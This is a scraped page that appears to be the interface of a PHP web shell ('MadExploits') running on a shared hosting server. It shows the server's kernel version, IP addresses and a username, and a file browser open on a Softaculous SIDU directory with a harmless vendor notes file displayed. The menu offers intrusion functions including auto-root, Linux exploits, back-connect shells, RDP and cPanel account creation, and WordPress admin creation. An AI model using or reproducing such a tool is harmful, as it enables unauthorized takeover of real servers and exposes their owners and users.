Linux premium155.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
LiteSpeed
: 162.0.235.200 | : 3.138.121.79
Cant Read [ /etc/named.conf ]
7.4.33
varifktc
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
softaculous /
sidu /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
fileindex.php
442
B
-rw-r--r--
import.php
2.44
KB
-rw-r--r--
info.xml
5.54
KB
-rw-r--r--
install.js
921
B
-rw-r--r--
install.php
3.04
KB
-rw-r--r--
install.xml
199
B
-rw-r--r--
md5
8.61
KB
-rw-r--r--
notes.txt
927
B
-rw-r--r--
upgrade.php
2.39
KB
-rw-r--r--
upgrade.xml
231
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : notes.txt
The following problem has been resolved in SIDU 3.7----------------------------------- If you get errors when you click on 'User' tab in menu then Solutions (Recommended by Script Vendor): 1 - open file: user.php ======================== <?php //0id 1tab 2user@host 3db 4table include 'inc.page.php'; $SIDU['page']['nav']='defa'; uppe(); echo "<div class='web'>"; main($SIDU,$user,$acs,$acs2,$grant,$cmd); echo '</div>'; down(); ... ========================= Above is the top part of user.php. simply add "@" before uppe() and main(...) and down() so it will look like the following: ======================== <?php //0id 1tab 2user@host 3db 4table include 'inc.page.php'; $SIDU['page']['nav']='defa'; @uppe(); echo "<div class='web'>"; @main($SIDU,$user,$acs,$acs2,$grant,$cmd); echo '</div>'; @down(); ... ========================= 2)We have changed the php requirement to 5.4 due to syntax error in version 6.0.
Close